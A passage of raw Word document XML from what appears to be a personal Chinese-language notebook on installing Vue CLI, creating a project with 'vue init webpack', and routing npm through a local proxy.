          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，不过直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> npm install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实就可以重新安装他们</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381B288" w14:textId="77777777" w:rsidR="003668F7" w:rsidRDefault="003668F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183724E0" w14:textId="77777777" w:rsidR="003668F7" w:rsidRDefault="003668F7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5571AFB0" w14:textId="77777777" w:rsidR="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61EB0DBA" w14:textId="77777777" w:rsidR="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265AE014" w14:textId="77777777" w:rsidR="002D34EA" w:rsidRPr="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DC1E1F" w14:textId="77777777" w:rsidR="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FCC890" w14:textId="77777777" w:rsidR="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00C1F696" w14:textId="77777777" w:rsidR="002D34EA" w:rsidRDefault="002D34EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F2FDB8" w14:textId="77777777" w:rsidR="00FA4EED" w:rsidRDefault="00FA4EED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BF0137" w14:textId="1553F7C8" w:rsidR="00DC1DED" w:rsidRPr="00DC1DED" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="674" w:name="_Toc159780104"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="674"/>
    </w:p>
    <w:p w14:paraId="349E84C8" w14:textId="77777777" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD4D271" w14:textId="070F2C37" w:rsidR="006032E1" w:rsidRDefault="006032E1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚手架工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058B26A" w14:textId="281C604C" w:rsidR="00DC1DED" w:rsidRPr="00EF6772" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF6772">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>npm install -g vue-cli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C16A78" w14:textId="70434893" w:rsidR="00DC1DED" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个安装命令一开始等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟。我走的美国亚特兰大的节点，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分钟后才开始下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D20B45" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44227E5D" w14:textId="43E5BFE2" w:rsidR="00B16EEE" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6772">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6772">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -V</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查是否安装成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FEE0A6" w14:textId="73329E44" w:rsidR="005078A0" w:rsidRPr="005078A0" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005078A0">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2.9.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9DB73" w14:textId="76C71139" w:rsidR="005078A0" w:rsidRDefault="00EF6772" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后来我安装了一个版本，为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F6EF0C" w14:textId="15D575D5" w:rsidR="00B16EEE" w:rsidRDefault="00EF6772" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF6772">
        <w:t>@vue/cli 5.0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D61F73" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B09F6C" w14:textId="5C651FA5" w:rsidR="00B16EEE" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="675" w:name="_Toc159780105"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="002E497B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="675"/>
    </w:p>
    <w:p w14:paraId="7F27A76B" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74606D24" w14:textId="407C3B12" w:rsidR="002E497B" w:rsidRDefault="002E497B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="676" w:name="_Toc159780106"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其一</w:t>
      </w:r>
      <w:r w:rsidR="00F11523">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F11523">
        <w:t>vue init webpack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="676"/>
    </w:p>
    <w:p w14:paraId="455F3173" w14:textId="654E2982" w:rsidR="00615D6B" w:rsidRPr="00B16EEE" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有自己创建目录的话：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8F288F" w14:textId="5257CBF9" w:rsidR="00B16EEE" w:rsidRPr="00615D6B" w:rsidRDefault="005078A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F11523">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vue init webpack firstApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337FCA76" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F01591" w14:textId="38BF5C13" w:rsidR="00B16EEE" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果自己创建目录然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进去，再创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目的话：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E57467B" w14:textId="4B0843A6" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F11523">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vue init webpack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化一下即可</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时还会加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webpack</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所依赖的包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A983AE" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC70232" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRPr="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>输入命令后，会询问我们几个简单的选项，我们根据自己的需要进行填写就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D32615" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3468F5A1" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRPr="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Project name :</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>项目名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，如果不需要更改直接回车就可以了。注意：这里不能使用大写，所以我把名称改成了</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>vueclitest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A40106" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRPr="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Project description:</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>项目描述，默认为</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>A Vue.js project,</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>直接回车，不用编写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C80D5B" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRPr="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Author</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>：作者，</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>如果你有配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的作者，他会读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB55585" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRPr="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Install vue-router? </w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>是否安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>的路由插件，我们这里需要安装，所以选择</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239E93A7" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRPr="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ESLint to lint your code? </w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>是否用</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ESLint</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>来限制你的代码错误和风格。我们这里不需要输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>（建议），如果你是大型团队开发，最好是进行配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15933A53" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRPr="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">setup unit tests with Karma + Mocha? </w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>是否需要安装单元测试工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Karma+Mocha</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>，我们这里不需要，所以输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57779529" w14:textId="4C312EA9" w:rsidR="00B16EEE" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Setup e2e tests with Nightwatch?</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>是否安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>e2e</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>来进行用户行为模拟测试，我们这里不需要，所以输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00615D6B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6568ACCB" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219799E8" w14:textId="595FA8F8" w:rsidR="00B16EEE" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建时间很长，默认会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代理。</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如图，</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置了代理走</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:t>6666</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建的过程中，使用</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidR="004D0AD5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代理来进行构建。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D9DA8" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794076AA" w14:textId="7C96F6EE" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="468BF82E" wp14:editId="0A89076E">
            <wp:extent cx="5274310" cy="2467610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1405239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39812" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2467610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A2E8F" w14:textId="77777777" w:rsidR="00615D6B" w:rsidRDefault="00615D6B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E90A88" w14:textId="39F1C3F1" w:rsidR="00615D6B" w:rsidRDefault="004D0AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
